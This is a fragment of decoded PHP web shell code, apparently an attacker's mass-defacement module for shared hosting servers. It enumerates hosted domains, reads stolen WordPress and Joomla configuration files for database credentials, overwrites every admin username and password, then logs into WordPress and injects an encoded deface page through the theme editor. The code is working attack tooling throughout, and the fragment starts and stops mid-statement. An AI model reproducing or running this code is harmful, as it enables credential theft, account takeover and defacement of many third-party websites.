/* Decoded by unphp.net */
?>
CMS | '; $p = 0; if(is_readable("/var/named")){ $list = scandir("/var/named"); $current_dir = posix_getcwd(); $dir = explode("/",$current_dir); foreach($list as $domain){ if(strpos($domain,".db")) { $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); error_reporting(0); $link = $pageURL.'pee/'.$owner['name']; cms_add($link,$domain,$owner['name'],"WordPress"); cms_add($link,$domain,$owner['name'],"Joomla"); cms_add($link,$domain,$owner['name'],"vBulletin"); cms_add($link,$domain,$owner['name'],"WHMCS"); cms_add($link,$domain,$owner['name'],"PhpBB"); cms_add($link,$domain,$owner['name'],"MyBB"); cms_add($link,$domain,$owner['name'],"IPB"); cms_add($link,$domain,$owner['name'],"SMF"); cms_add($link,$domain,$owner['name'],"Drupal"); cms_add($link,$domain,$owner['name'],"e107"); cms_add($link,$domain,$owner['name'],"Seditio"); cms_add($link,$domain,$owner['name'],"osCommerce"); } } } }else{ echo'
CMS | '; $content = file_get_contents($pageURL.'pee.tmp'); echo $content; } break; ################MASS DEFACE case 'pass_change': echo <<
DOMAIN | USER | CMS | STATUS | '; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")) { $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); $url = 'http://'.$domain; if(chk_header($pageURL.'pee/'.$owner['name'].'-WordPress.txt')) { $config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt'; file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt'); ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt'); $hostname = Find($cnf,"define('DB_HOST', '","');"); $username = Find($cnf,"define('DB_USER', '","');"); $password = Find($cnf,"define('DB_PASSWORD', '","');"); $dbname = Find($cnf,"define('DB_NAME', '","');"); $prefix = Find($cnf,"table_prefix = '","'"); $link=mysql_connect($hostname,$username,$password); if ($link) { $hash = crypt($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `user_login` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'"); $req =@mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'"); $data = mysql_fetch_array($req); $site_url=$data["option_value"]; error_reporting(0); echo '|||||||||||||||||||||||||||||||||||||||||
'.$domain.' | '.$owner['name'].' | WordPress | success.. | '; }else{ echo '|||||||||||||||||||||||||||||||||||||||||
'.$domain.' | '.$owner['name'].' | WordPress | mysql fail | '; } } elseif(chk_header($pageURL.'pee/'.$owner['name'].'-Joomla.txt')) { ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-Joomla.txt'); $config = $pageURL.'pee/'.$owner['name'].'-Joomla.txt'; if(preg_match('%(JConfig|mosConfig)%',$cnf)){ ###### if(preg_match('%JConfig%', $cnf)){ $username=Find($cnf,"\$user = '","'"); $password=Find($cnf,"\$password = '","'"); $dbname=Find($cnf,"\$db = '","'"); $prefix=Find($cnf,"\$dbprefix = '","'"); $link=mysql_connect("localhost",$username,$password); if ($link) { $hash = md5($user); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'"); echo '|||||||||||||||||||||||||||||||||||||||||
'.$domain.' | '.$owner['name'].' | Joomla | success.. '; }else{ echo ' | |||||||||||||||||||||||||||||||||||||||||
'.$domain.' | '.$owner['name'].' | Joomla | mysql fail | '; } } ##### elseif(preg_match('%mosConfig%',$cnf)){ $username=Find($cnf,"\$mosConfig_user = '","'"); $password=Find($cnf,"\$mosConfig_password = '","'"); $dbname=Find($cnf,"\$mosConfig_db = '","'"); $prefix=Find($cnf,"\$mosConfig_dbprefix = '","'"); $pwd = md5($npass); $link=mysql_connect("localhost",$username,$password); if ($link) { $hash = md5($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'"); echo '|||||||||||||||||||||||||||||||||||||||||
'.$domain.' | '.$owner['name'].' | Joomla | success.. '; }else{ echo ' | |||||||||||||||||||||||||||||||||||||||||
'.$domain.' | '.$owner['name'].' | Joomla | mysql fail | '; } } } ######### } } } } elseif(is_readable("/etc/passwd")){ echo'
DOMAIN | USER | CMS | STATUS | '; foreach($etcz as $etz){ $etcc = explode(":",$etz); if(chk_header($pageURL.'pee/'.$etcc[0].'-WordPress.txt')) { $config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt'; file_get_contents($pageURL.'pee/'.$etcc[0].'-WordPress.txt'); ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$etcc[0].'-WordPress.txt'); $hostname = Find($cnf,"define('DB_HOST', '","');"); $username = Find($cnf,"define('DB_USER', '","');"); $password = Find($cnf,"define('DB_PASSWORD', '","');"); $dbname = Find($cnf,"define('DB_NAME', '","');"); $prefix = Find($cnf,"table_prefix = '","'"); $link=mysql_connect($hostname,$username,$password); if ($link) { $hash = crypt($user); mysql_select_db($dbname,$link) ; $req =mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'"); $data = mysql_fetch_array($req); $site_url=$data["option_value"]; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `user_login` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'"); error_reporting(0); echo '|||||||||||||
'.$domain.' | '.$owner['name'].' | WordPress | success.. '; }else{ echo ' | |||||||||||||
'.$domain.' | '.$owner['name'].' | WordPress | mysql fail | '; } } elseif(chk_header($pageURL.'pee/'.$etcc[0].'-Joomla.txt')) { ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$etcc[0].'-Joomla.txt'); $config = $pageURL.'pee/'.$owner['name'].'-Joomla.txt'; if(preg_match('%(JConfig|mosConfig)%',$cnf)){ ###### if(preg_match('%JConfig%', $cnf)){ $username=Find($cnf,"\$user = '","'"); $password=Find($cnf,"\$password = '","'"); $dbname=Find($cnf,"\$db = '","'"); $prefix=Find($cnf,"\$dbprefix = '","'"); $site_url = Find($cnf,"\$mailfrom = '","'"); $site_url = explode("@",$site_url); $link=mysql_connect("localhost",$username,$password); if ($link) { $hash = md5($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'"); echo '|||||||||||||
'.$domain.' | '.$owner['name'].' | Joomla | success.. '; }else{ echo ' | |||||||||||||
'.$domain.' | '.$owner['name'].' | Joomla | mysql fail | '; } } ##### elseif(preg_match('%mosConfig%',$cnf)){ $username=Find($cnf,"\$mosConfig_user = '","'"); $password=Find($cnf,"\$mosConfig_password = '","'"); $dbname=Find($cnf,"\$mosConfig_db = '","'"); $prefix=Find($cnf,"\$mosConfig_dbprefix = '","'"); $site_url = Find($cnf,"\$mailfrom = '","'"); $site_url = explode("@",$site_url); $link=mysql_connect("localhost",$username,$password); if ($link) { $hash = md5($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'"); echo '|||||||||||||
'.$domain.' | '.$owner['name'].' | Joomla | success.. '; }else{ echo ' | |||||||||||||
'.$domain.' | '.$owner['name'].' | Joomla | mysql fail | '; } } } ######### } } } } break; ################MASS DEFACE case 'wp_def': ################### USER & PASS ################ $user = 'admin'; $pass = 'foo'; ################################################ echo <<
DOMAIN | USER | CMS | STATUS | DEF URL | '; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")) { $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); $url = 'http://'.$domain; if(chk_header($pageURL.'pee/'.$owner['name'].'-WordPress.txt')) { $config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt'; file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt'); ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt'); $hostname = Find($cnf,"define('DB_HOST', '","');"); $username = Find($cnf,"define('DB_USER', '","');"); $password = Find($cnf,"define('DB_PASSWORD', '","');"); $dbname = Find($cnf,"define('DB_NAME', '","');"); $prefix = Find($cnf,"table_prefix = '","'"); $link=mysql_connect($hostname,$username,$password); if ($link) { $hash = crypt($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `user_login` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'"); $req =@mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'"); $data = mysql_fetch_array($req); $site_url=$data["option_value"]; error_reporting(0); echo '|||
'.$domain.' | '.$owner['name'].' | WordPress | [#]
User Pass Changed '; $post = 'log=admin&pwd=foo&rememberme=forever&wp-submit=Log In&testcookie=1'; $def=" echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($deface))))."'))); exit; ?>"; $buffer0 = CurlPage($site_url.'/wp-login.php',$post); if(!preg_match("/logout/i",$buffer0)) { echo "[X] FAILED TO LOGIN "; }else{ echo "[#] LOGGED IN :D "; $urlz = $site_url."/wp-admin/theme-editor.php"; $themeditor = CurlPage($urlz,$cookie,null); if(preg_match("/update file/i",$themeditor)){ echo "theme-editor opened | "; } else { echo "error
opening theme edtitor!"; }
$nola = explode(Chr(10),$themeditor);
foreach($nola as $nline){
if(preg_match('%theme-editor\.php\?file=%',$nline) &&
preg_match('%\((404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){
$modify[Find($nline,'(',')')] = Find($nline,'';
if(is_array($modify)){
foreach($modify as $met=>$indfile){
$nri = str_replace('.','_',$met);
$nri = "n".$nri;
$indfile =str_replace("&","&",$indfile);
$url = trim($site_url."/wp-admin/".$indfile);
$themepage = CurlPage($url,"");
$_wpnonce = Find($themepage,'name="_wpnonce" value="','"');
$_file = Find($themepage,'name="file" value="','"');
$nfile = explode('themes',$_file);
$jfile = $site_url."/wp-content/themes".end($nfile);
//Update file
$url = $site_url."/wp-admin/theme-editor.php";
$postme = "newcontent=".$def."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";
$themedied = CurlPage($url,$postme);
if(preg_match('%||||
'.$domain.' | '.$owner['name'].' | WordPress | [x] mysql fail | '; } }}}}} break; // Uploader case 'uploader': echo '